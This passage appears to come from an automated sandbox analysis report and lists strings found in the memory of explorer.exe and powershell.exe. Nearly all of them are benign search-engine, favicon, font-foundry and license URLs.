Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.lycos.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.jp/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.co.uk/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com.cn/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.msn.com/results.aspx?q=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nate.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.naver.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.nifty.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.orange.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.rediff.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.seznam.cz/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.sify.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahoo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&p=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search.yam.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search1.taobao.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://search2.estadao.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://searchresults.news.com.au/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://service2.bfast.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://sitesearch.timesonline.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://so-net.search.goo.ne.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.aol.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.freenet.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.lycos.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.t-online.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://suche.web.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://tw.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://udn.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.ask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://uk.search.yahoo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://vachercher.lycos.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://video.globo.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://web.ask.com/
Source: explorer.exe, 0000001E.00000000.844768723.0000000007AF0000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.com
Source: explorer.exe, 0000001E.00000002.911636263.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.abril.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.alarabiya.net/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&keyword=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&tag=ie8search-20&index=blended&linkCode=qs&c
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.amazon.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.aol.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000018.00000002.859302695.000001D7AC0CF000.00000004.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.arrakis.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.asharqalawsat.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.auction.co.kr/auction.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.baidu.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cdiscount.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ceneo.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cjmall.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.clarin.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.cnet.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.dailymail.co.uk/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.docUrl.com/bar.htm
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.etmall.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.excite.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gismeteo.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.gmarket.co.kr/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.in/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.co.uk/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.sa/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.cz/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.it/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.pl/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.google.si/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.iask.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.kkbox.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.linternaute.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.maktoob.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.merlin.com.pl/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&a=
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 0000001E.00000000.845185963.0000000007BE3000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 0000001E.00000000.846967624.000000000B976000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
